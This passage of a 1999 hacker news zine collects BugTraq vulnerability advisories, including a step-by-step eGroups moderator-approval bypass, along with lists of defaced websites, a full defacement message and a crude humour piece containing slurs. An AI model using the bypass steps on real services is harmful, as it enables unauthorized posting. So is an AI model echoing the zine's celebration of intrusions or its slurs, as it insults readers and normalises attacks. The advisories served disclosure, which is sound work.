Str. 223 - 225 57076 Siegen Germany Tel.: +49-271-48950-15 Fax: +49-271-48950-50 R.Baumgart@secunet.de - [To unsubscribe, send mail to majordomo@lists.gnac.net with "unsubscribe firewalls" in the body of the message.] @HWA 41.0 Anyboard WWW board vulnerabilities. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ from http://www.net-security.org/ by BHZ, Sunday 25th Apr 1999 on 11:55 am CET Yet another post from BugTraq. Draz Q published a short summary of problems with a webrelated software in eurohack. Basicly it sounds pretty much like a common CGI problem. It does not give user or root access, only the ability to fake/modify just about anything showed by the program. However, in the parts left out by me Draz Q mentiones a great many sites (including commercial sites) exposed to the vulnarbility. ================================================== Anyboard Forum Security Hazard - POSTED by draz Q. ================================================== Anyboard by Netbula (www.netbula.com) After using the Anyboard Forum at my own page (www.radikal.net/radikal) for a while I've found a "little" (?) flaw in it that allows _anyone_ to get the admin login and password. This is because the forum CFG file is available to anyone. This, allows anyone to, - Delete messages in the forum (purge the whole forum) - Modify messages - Write messages as Admin - Change admin login and password - In short, do anything in the Message forum @HWA 42.0 Egroups bug.. ~~~~~~~~~~~~~ from http://www.net-security.org/ EGROUPS BUG by BHZ, Sunday 25th Apr 1999 on 11:55 am CET Philip Stoev reports to BugTraq about security flaw in eGROUPS. eGROUPS is a web site providing mailing list services.The mailing lists (aka groups) can be moderated, and the moderator can approve/revoke posted messages by sending blank emails to certain addresses in the egroups system. This makes it trivial for anyone to approve a message without being a moderator. -=- 1. Take a look at the header of some previous message sent to the group. Extract the following header line: Return-Path: the number XXX here is a sequence number assigned to each message sent to the group. 2. Send the message you want to send to the list. The message will be sent to the moderator for approval. 3. Send 256 blank messages to addresses like: GROUPNAME-accept-ZZmYYY@egroups.com Where ZZ is a hexadecimal number from 00 to FF. YYY is XXX + 1; The presence of the ZZ number appears to be an attempt to put some security into the entire system. However, this number is constant for each group and does not change in time. Once guessed, subsequent messages can be approved with a single email. Your message will appear as if approved by the moderator and will be distributed to the group. No header spoofing is necessary, because the eGROUPS system does not check the source address of the incoming messages. eGROUPS was notified exactly one week ago. Philip Stoev -Prepare for SAT & TOEFL at http://studywiz.hypermart.net =This message was sent by Philip Stoev (philip@einet.bg) =tel: (359 2) 715949, ICQ: 23465869 @HWA 43.0 Ok lets see some I.D (biometrics) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: Sysadmin@kktv.com Okay, Let's See Some ID by Jeffery Zbar As corporations dispatch legions of teleworkers to remote sites and home offices, how can they ensure that a user logging on to the company network isn't an imposter who's cracked the teleworker's password? Increasingly, the answer is with biometrics - a security scheme that verifies a user's identity based on a physical characteristic such as a fingerprint or a signature. Biometric scanners don't actually store any personal information. Instead, they collect and check algorithmic characteristics unique to you, whether the look of your face or the rhythm of your typing. Although the government and financial institutions have used biometrics since the 1970s, the corporate sector is catching up - particularly with telecommuters being "pushed to [adopt] security technology to ensure they're not hacked through the back door," says Erik Bowman, and analyst with Bethesda, Md.-based CardTech/SecurTech (www.stst.com), publisher of ID Word, a trade publication. A new generation of low-cost, plug-and-play products is helping make biometrics one of the top 10 technologies to watch in 1999, according to a Gartner Group report, with some analysts predicting widescale deployment as early as 2001. A spokesperson for the fingerprint scanner vendor Identicator Technology predicts this year "we'll see this technology securing laptops, PDAs, and cell phones. It's just a matter of time before we will open our cars and homes with biometrics." We found 14 companies at work developing a wide array of desktop biometric products (prices range from $50 to $400). Most scan fingerprints, but here's a quick rundown, including devices that pinpoint other distinctive features. Eyes IriScan (iriscan.com): PC Iris, a handheld scanner that identifies the pattern in the eye's iris; available this spring. Fingerprints Advanced Precision Technology Inc. (www.aprint.com): a smart card that stores a hologram image of a fingerprint scan; American Biometric Co. (www.abio.com): BioMouse Plus, an optical fingerprint imager; Biometric Access Corp. (www.biometricaccess.com): Secure Touch 98, an optical fingerprint imager; Biometric Identification Inc. (www.biometricid.com): a full line of VeriPrint fingerprint imagers (starting at $700); Digital Persona (www.dpersona.com): U.are.U fingerprint scanner and software packages; Identicator (www.identicator.com): Fingerprint Identification Technology-based optical fingerprint scanners, available through Compaq; Veridicom (www.veridicom.com): the FPS100, a finger-imaging sensor the size of a postage stamp. Faces Biometric Access Corp.: One-One-One Facial generates a digital "facial signature" matched against a stored signature; Miros (www.miros.com): TrueFace facial verification software works with popular videoconferencing cameras; Visionics (www.faceit.com): FaceIt facial verification software, also for popular videoconferencing cameras. Keystrokes Net Nanny BioPassword (www.netnanny.com): monitors your PC keyboard to measure the precise timing and fluctuations between keystrokes while typing a password phrase. Signatures Cyber-Sign (www.cybersign.com): software that recognizes swirls and other characteristics in a handwritten signature. Voices Keyware Technologies (www.keywareusa.com): partering with ST Microelectronics on a voice verification system that tracks a spoken word code; due in July. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 44.0 Javascript hotmail password trap ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Approved-By: aleph1@UNDERGROUND.ORG X-Mailer: Mozilla 4.51 [en] (X11; I; Linux 2.0.36 i586) X-Accept-Language: en MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <3720C21C.B5D5E670@KASEY.UMKC.EDU> Date: Fri, 23 Apr 1999 13:55:24 -0500 Reply-To: "David L. Nicol" Sender: Bugtraq List From: "David L. Nicol" Organization: University of Missouri - Kansas City network operations Subject: javascript hotmail password trap To: BUGTRAQ@netspace.org Hello, I was informed this morning that a free form data mailer I maintain (http://www.tipjar.com/generic.html) was being involved in a javascript-based hotmail password stealing scheme. I have located the originating page (with the script) and sent it to the contact address hotmail puts on their autoresponder documents. I will share an URL for the (fully escaped) exploit in a week or two, to give hotmail time to patch their systems. (that's correct procedure, right?) So far the perp has a few dozen passwords (and I've got them too, they appear in my apache server log) I have offered to send hotmail the list. As there are many free form data mailers around, I am not making any modifications to my tool (which is performing correctly) which would chase the password trapper to another form mailer whose admin does not keep as good of logs. The page with the script on it contains a warning that your password has just been trapped; so unless there are other copies of this script running around all the victims know it already. @HWA 45.0 Discus web based discussion software advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Approved-By: aleph1@UNDERGROUND.ORG X-Sender: hhp@ns.suspend.net MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: Date: Fri, 23 Apr 1999 22:34:08 -0400 Reply-To: hhp@NS.SUSPEND.NET Sender: Bugtraq List From: Elaich Of Hhp Subject: Discus advisory. To: BUGTRAQ@netspace.org In-Reply-To: <3720E2B6.6031A2E7@DATASHOPPER.DK> (hhp) Discus advisory. (hhp) --------------------------------------------------- Discus (Free discussion for your Web Site!) at http://www.chem.hope.edu/discus/ has a directory and file permission problem. The code is really messy and they need to learn file and permission operations better. The source determines the mode of the directories and files from other sources: Line: 533 in discus3_01/source/src-board-setup which is a totally bad idea being that no matter what, the private files should not be +r... ie, the *.txt's and so on. I contacted the software programmers and hope they recognize this problem being that the files are so open and easy to find with any public search engines. I noticed quite a few servers are using this software and I would guestimate about 80% or more are vulnerable to getting thier userfile cracked and their server rooted. So my suggestion to people using this software is check your modes or either wait for a new release of the software. I did not want to get into making a patch being that they need to totally redo some of their methods. elaich - 2:30:15am CST 4/24/1999 -------------------------------------------- elaich of the hhp. Email: hhp@hhp.hemp.net / pigspigs@yahoo.com Voice: 1800-Rag-on-gH pin: The-hhp-crew Web: http://hhp.hemp.net -------------------------------------------- @HWA AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * *****************************************************************************
Come.to/Canc0n99 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j http:/ 99 http:o http:/ login: sysadmin n99 httpi /come. password: tp://comn to/Can me.to/Cat c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h http:/ industry people to attend with booths and talks. 99 http:e /come. you could have a booth and presentation for the cost of p://comel http:/ little more than a doorprize (tba) contact us at our main n99http:i http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s http:/ for updates. This is the first Canadian event of its type invalid t 403 Fo and will have both white and black hat attendees, come out logged! ! 404 Fi and shake hands with the other side... *g* mainly have some IP locked ome.to fun and maybe do some networking (both kinds). see ya there! hostname http:/ x99http:x o/Canc x.to/Canx http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 Canc0n99 Canc0n99 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$ ! ! $ $ ! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** ! $ $ ! ! $$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$ www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net * One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Contributed by Merlock You Know You're In Design Hell When You See... "This page is designed for 1600x1200 resolution" Who the fuck designs web pages for resolutions that high? Get a clue jocko, Most people can't even view that high... and those that can need a microscope on their 15" monitors. blinking text Blinking text makes it nearly impossible to pay attention to anything else on the page. It reduces 87% of all surfers to a helpless state of fixated brain-lock, much like that of a rabbit caught in the headlights of an oncoming semi. This is not good. If you abuse the blink tag, you deserve to be shot. Clue: if you use the blink tag, you're abusing it. gratuitous animation With animations you get the all the wonderful injuries of the blink tag with the added insult of the graphics download time. People who abuse these should have flip books rammed into every body orifice until they figure out that a two- or three-frame graphics loop is even less pleasant than that. marquees So, maybe you think the blink tag and cheesy animations are the worst abuse half-bright websmiths can perpetrate on your retinas? Naaahhhhh. For those times when too much is just not enough, the Great Satan of Redmond has given us , which allows you to create animated scrolling marquees at the drop of an angle bracket. This bastard cousin of the blink tag can cause vertigo and seizures in susceptible individuals, reducing them to exactly that state of drooling lobotomized idiocy that's such an essential prerequisite to purchasing Microsoft products. Coincidence? We think not. garish backgrounds The very next time we stumble across a page composed by somebody who thinks it's cool to use leaping flames or a big moire pattern or seven shades of hot pink swirly as a background, we swear we are going to reach right through the screen and rip out that festering puke's throat. If there's a worse promoter of eyestrain and migraines than the blink tag, this is it. unreadable text/background combinations The world is full of clowns who think their text pages look better in clown makeup, clashing colors galore (your typical garish-background idiot also pulls this one a lot). The magic words these losers need to learn are "luminance contrast". Your color sense is between you and the Gods of Bad Taste, but if you don't stick to either light text on dark backgrounds or the reverse, you will drive away surfers who like to be able to read without noticing the effort. brushscript headings Brushscript headings are rude. Unless, that is, you think every single surfer hitting your page truly craves the opportunity to hang out long enough to watch toenails grow while a brushscript GIF downloads just to display a heading you could have uttered in a nice, tasteful, fast font. "resize your browser to..." instructions Right. As if we wanted our browsers to take up that big a chunk of screen real estate. But what's really annoying is that most of the time these bozos get it wrong. Like, their browser has an 8-pixel offset, ours eats 20, and they forgot to allow for scroll bars so they're off by at least 30 pixels anyway and the display graphics are complete garbage. You Know You're In Content Hell When You See... hit counters "You are the 2,317th visitor to this page." Yeah, like we care. On Yahoo's and Alta Vista's web it takes no effort at all to find and bounce off every page on the planet with a reference to (say) credenzas or toe jam. In this brave new world, hit counters are nothing but a particularly moronic form of ego display, impressing only the lemming-minded. They may tell you how many people got suckered into landing on a glitzy splash page, but they won't even hint how many muttered "losers!" and surfed out again faster than you can say "mouse click". To add injury to insult, hit counters screw up page caching, heaping more load on the Internet's wires. stale links Stale links are lame. People who have lots of stale links are lamers. OK, everybody has a pointer vaporize on them once in a while -- but haven't you noticed that stale links generally show up on a page in swarms, like cockroaches? That's because people with good web pages use them and hack them and fix broken pointers quickly so they're unlikely to have more than one at a time busted. A page with lots of stale links yells "My author is a lazy, out-of-it loser with the attitude of a slumlord running a cockroach palace." images loading on other servers Mostly done by geoshities bastards who cant spring for the real webserver. OK, we realize you cant get much for free these days, but does that give you liscense to clog someone else's server with your site traffic? NO. You want to put that 512k image of Pamela Lee's boobs (before the implants came out) on your site? Fine... just pay the cash to get your own space. pages forever under construction Surfers learn quickly that for every ten "under construction" signs that go up, maybe two will ever come down before the heat-death of the Universe. This is stupid. HTML is not rocket science and prototyping pages is not a slow process. Anybody who can't find the time to clean the construction signs off their pages should yank them and take up a hobby better matched to their abilities, like (say) drooling, staring at the wall, or picking the bugs out of their hair. You Know You're In Style Hell When You See... pointless vanity pages If we had a nickel for every home page we've seen that's a yawn-inducing variation on "Hi, here's me and here's a cute picture of my dog/cat/boyfriend/girlfriend" we could retire to Aruba with a bevy of supermodels tomorrow. Clue: if you don't have something to say, shut up. And keep it off the Web; life is too short for boredom. angst and pretentiousness We were originally going to vent our spleen at black backgrounds, until we realized that black is not the problem. It's the three overlapping populations of losers that compose 99% of the black backgrounds on the Web that are the problem. These are (a) cooler-than-thou art fags, (b) angst-ridden adolescents, and (c) the kind of coffeehouse trendoids who actually believe subscribing to Wired makes them hip. Clue: angst and pretentiousness are boring. People who spew bad poetry and/or make a fetish of writing in all-smalls and/or traffic in fuzzy images of mediocre avant-garde art should slit their wrists or join a commune or do anything else that will keep their self-indulgent sludge off the Web. corporate logorrhea We've all seen them -- corporate pages that start by downloading some monster logo graphic from hell. And after you've waited a million or three years for it to finish, the rest of the page has a ton of gush about how wonderful the company is, maybe some lame-oid promotion that's just a hook to get you on their mailing list, and no content at all. Tip for marketroids: this is not effective, unless your goal is to make the company look like every other moronic me-too outfit that thinks having a Web address will make it look like it has some semblance of a clue. Not! advertisements from hell Don't you love top of the page ads that are changed every time the page is accessed? If you're jumping back and forth between a parent page and a child devoted to a subcategory, you get the dubious pleasure of waiting for a new ad graphic to load each time! no email address for feedback These folks want you to look and listen to them, but they don't want to hear from you. Isn't it interesting that half the Web pages of Fortune 500 companies, the big names like McDonald's, won't tell you what their email address is? Shows you just how much these gutless wonders really value their customers. Another tip for marketroids: this sort of thing makes your company look exactly as arrogant, stupid, and indifferent to its customers as it actually is. Think of an email feedback address as a sort of necessary disguise. You Know You're In Extension Hell When You See... broken HTML A lot of broken HTML gets inflicted on the world because it happens to get past the brain-damaged `parser' of everyone's favourite bloatware web browser. The designer gets the perversity prize if he can provoke radically different behaviour in different browsers or browser versions. unstable extensions We just love it when our browser freezes while loading a page, hangs for a while, and then ignominiously coredumps. When this happens, you can bet money the page is using a Netbloat extension nobody ever bothered to debug properly (there are a semi-infinite number of these). The worst offender is undoubtedly... frames Frames are for idiots. They flat don't work on many browsers, and core-dump many they're theoretically supposed to work in. They eat up precious screen space with frame widget cruft. And, used with sufficient ingenuity, they make it almost impossible to work out where you've been and how to get back to where you got there from. java applets For those who truely want to piss off the 28.8 modem user. These things barely work in a 3.x browser, and when they do... 5 years later, you are finally staring at the damn rotating cube in front of your face and ask "why?" Hey lamers, get a clue and start writting REAL programs in C @HWA HOW.TO How to hack part 3 ~~~~~~~~~~~~~~~~~~ To be continued (probably) in a future issue... if time permits and inclination is prevelant. ie: if & when I feel like it.. :p (discontinued until further notice) Meanwhile read this: http://www.nmrc.org/faqs/hackfaq/hackfaq.html Link And especially, this: http://www.tuxedo.org/~esr/faqs/hacker-howto.html Link (published in its entirety in issue #12) @HWA SITE.1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) April 19th from HNN rumours section: Cracked Some folks had a busy weekend. The following sites have been reported as cracked. http://www.conamed.gob.mx http://www.flyfishboats.com http://www.videosonsale.com/ http://www.cdmusicsales.com/ http://www.bestcreditcards.com/ http://www.allcreditcards.com/ http://www.fixyourcreditnow.com/ http://www.bestphoneplans.com/ http://orac.sunderland.ac.uk/ http://www.knox.net http://www.towngreen.com - Again http://www.fjr.com http://www.classicsystems.ca/ http://www.kose.net http://www.flyufos.com http://www.thelovezone.com http://www.waterwarez.com @HWA April 20th from HNN rumours section contributed by Anonymous Russians on the Prowl There seems to be a increase in cracks of US military sites originating from Russia. With the recent anti-US stance of President Boris Yelstin in regards to the NATO bombings of Kosovo many Russian crackers are not fearful of prosecution by US authorities. Some recent cracks include the Commander of Naval Forces in Guam (www.guam.navy.mil), the Military District of Washington (mdw-www.army.mil), the Joint Tactical Unmanned Aerial Vehicle Project (www.jtuav.redstone.army.mil) and the Department of Navy Acquisition Reform (www.acq-ref.navy.mil). We where able to grab a mirror of yesterdays crack of the Anniston Army Depot (www-anad.army.mil). Cracked page archive: http://www.hackernews.com/archive/crackarch.html April 20th From http://hackedalert.8m.com's hacker news list Indian hackers stike again: The Indian Hackers are on fire yet a gain we see another site hacked by this group of hackers. Who will be next? We can only wait and see. The site was hacked last night(http://www.brockfair.com). April 21st From HNN http://www.hackernews.com/ RUMOURS section contributed by Anonymous Cracked Yesterdays shootings at Littleton High School outside of Denver has prompted a few website cracks. http://mon.hiroins-net.ne.jp http://sunrise.roma1.infn.it http://icarus.umesci.maine.edu http://orac.sunderland.ac.uk We have also received reports that several other sites are being targeted in the Denver area in relation to this event. While not related to the above this site was also reported as cracked. http://crevierbmw.com April 22nd contributed by Anonymous Cracked The following sites have been reported as Cracked http://www.kapo.ch http://www.gr.ch http://www.klosters.ch http://www.progressive.ch http://www.ci.fort-collins.co.us/ http://memex.lib.indiana.edu/ http://cddocs.fnal.gov http://www.tang.com.au/ gH http://www.ciudadfutura.com http://www.perlas.com.mx http://www.naughtytalk.com http://www.herbonline.com/ gH Dear Admin, Sorry to notify you, but your system was compromised, but we aren't here to destroy your system, we are here to help. Just mv html.index index.html and itz all fixed. Don't go off saying like the government does and say this costed you millions of dollars and shit, because it can be fixed with a single command and don't worry, this machine isn't trojaned or anything so have fun. View Old Index here. {animated guy NOT pissing on the tEam spL0it logo} tEam spL0it Have you ever had China bud? Team Spl0it - No replys to tha post from last and i figured that from the begining. A war with you would be like taking candy from a baby or even breaking a hoe off for her first time. Either we'll come on top right off the bat or we'll have to work to take you down, but never the less we'll win. I've seen post from team spl0it along time ago and i used to follow a few of their sloppy hackers and just figured they would die out after the imapd days were over, but i seem to have been wrong, seeing they are still around. I would appreciate a bit of respect in a territory you have no place being. For one, you are a sloppy hacking group who dont' fix anything you have done. Exploiting boxes after boxes for the simple fact to use them as trash to get caught on, never thinking someone could easily be folowing them around, just sitting and watching. No respect for hackers nor crackers due to the fact, they aren't on that level. Echoing non-passwd logins to the system with root permissions, not even attempting to hide from anything. The first thing you should be taught besides exploiting mass ammounts of networks, is how to fix how you got in. If you did this from the begining then maybe you wouldn't be known round the globe as a shitty pathetic un-experienced group of kids. If you want to step to us in any way or atleast admit and come out sayen you don't want a fight/war and it'll be stopped. But you are like kids who need to get a whooping atleast once to learn not to do something. This right here is your whooping, learn from it. But on a nicer note, enjoy the page discuss how we own you and smoke a blunt or joint to get high to this bomb ass herb site's new html. Most of you are probably high right now, tripping, but still trying to type straight. Keep toking, learn to stop choking and never stop smoking... Denver - This is gonna be a bit long and i figured i would let you know before hand. I feel for the people and Denver and my love goes out to every parent out their now that has to sleep another night with once less child. My full support goes out to you and the rest that was involved in this ordeal. The weird thing is that people are stereo typing half of this issue, saying that the internet was apart of it or that this was targeted on people in particular. Why is the media so hard in trying to plant the reason on stupid shit and try to give a bad name to something just to get the readers hyped up. Obviously, it's over now, the shooters are dead and nothing will resolve as a defenant answer. Leave it at that and stop bringing it up every 5 minutes and having these familys which lost children this week have to see or hear constantly. It's bad enough they have to go through something like this, but to hear about it everywhere you go and see it on everything you watch. It's pathetic how you don't think about how the family's feel about all these stories streching the truth and shit. Call it media or call it what you want, but it's nothing but a heartless soap opra yet deals with real life issues. Gaining and using bad happenings as ratings for them, doing big storys on shit that should be kept to the family and shit. Just is this my opinion and most of you will probably think that my opinion doesn't count and bla bla bla. My opinions get expressed about as much as it possibly can on the place everyone goes. The internet, people feel this is a bad thing for our kids and will root their brain. Well, you learn alot more things on the internet then you ever will in school. Half the things in school you won't use in anything in the future, yet on the internet, you use the current knowledge of learn the upcomming knowledge to be preparred. Actually learning stuff you will actually use in the future, stuff you will remember and grow more towards it's usage. The worst thing on the internet is actually the media underground, snooping around and trying to make a big story out of nothing. Nothing major down here happens, you don't understand the underground scene so keep your nose out of it. Just how i feel i suppose, but we are here to stay, so do what you wish, i can't stop you, but i can state my opinion where i can and when i want. To wrap this up, Denver familys i support and so do millions of millions of others, we feel and share you pain..... About this site - This is actually a china site for herbs and i noticed some nice things on this page. I might get me some chinese herbs and be happy, but this domains hosting company is to blaim for this. Make sure you email them and tell them their security sucks and might want to be given some free months of hosting for their mistake. Just a thought for the clients. I kinda like herb, because i makes me feel less pressured. I know some people are high right now on the internet just tripping over nothing. It's all good and keep smoking and one day it'll be legalized someone hear you instead of overseas and up in Canada. Smoke it how you want and stay high. I give the big middle finger to our government who has taken gods own doing which was set here to help where it's stated written in the middle. "God put herbs on earth to help man kind." Btw, Cypress Hill i love you for that, I say if you smoke, you have god's right which overpowers any law made by anyone. Say what you wish, but god is correct. Hehehe, you admins fix up your shit, work on firewalling and trip wiring your systems and maybe you wouldn't have these problems. Take care. Nato - Ask Nastrodmous (spelling?) what this war will end in. Could this be the war he stated would begin on june/july and be the begining of the end, lasting 30 years, killing off our own population ourselves. Just Something to think about. BIG SHOUT OUTS TO: complex-, nikfiend, Attrition.org, www.2600.com and staff, ne0h tha hacka boi, all of gH, sinnerz, #madland, #feed-the-goats, all of efnet just for the plain fact that efnet rules over all other nets and most of all herbs which keep us wanting to live another day. =AMEN= BIG FUCK YOUS TO: Every war/packet group on efnet, you have no skill and half of you i have noticed don't even understand how the denial of service you use works and thinks it effects every Ooperating System and shit, itz really amuzing to sit on a bsd box and watch myself get scanned and then hit with slice or an oob attack or scanned for netbus. Team spl0it and all it's affiliates who are pathetic newbies of the such, antionline for trying to talk shit behind my back, crak- on efnet, just because we owned you so so badly and anyone else who hates on another group for no reason, but jealousy. If you are gonna talk shit, have a bit of a background on the group and base your shit talking statements on facts, not asumptions... Copyright © gH - A bit high while done. HTML by : MostHateD of gH ROOT by : outburstx of gH Other unconfirmed sites, from Hacked Alert #9 April 24th http://www.jsims.mil http://stan.rmi.net http://www.herbonline.com http://www.towngreen.com http://www.luresa.com http://www.shastacollege.edu http://www.gaywired.com http://acceso2.uv.es http://www.icao.int http://www.infomanage.com http://www.shasta.cc.ca.us http://www.hpsd.com http://www.chinatv.net http://nutrition.uvm.edu http://www.silkpainting.com _________________________________________________________________________ A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html hack-faq Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html Original jargon file New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ New jargon file Mirror sites: ~~~~~~~~~~~~ http://www.csoft.net/~hwa/ (Down, we don't know whats going on at cubesoft) http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.genocide2600.com/~tattooman/zines/hwahaxornews/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Go there Brasil........: http://www.psynet.net/ka0z Go there http://www.elementais.cjb.net Go there Columbia......: http://www.cascabel.8m.com Go there http://www.intrusos.cjb.net Go there Indonesia.....: http://www.k-elektronik.org/index2.html Go there http://members.xoom.com/neblonica/ Go there http://hackerlink.or.id/ Go there Netherlands...: http://security.pine.nl/ Go there Russia........: http://www.tsu.ru/~eugene/ Go there Singapore.....: http://www.icepoint.com Go there Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]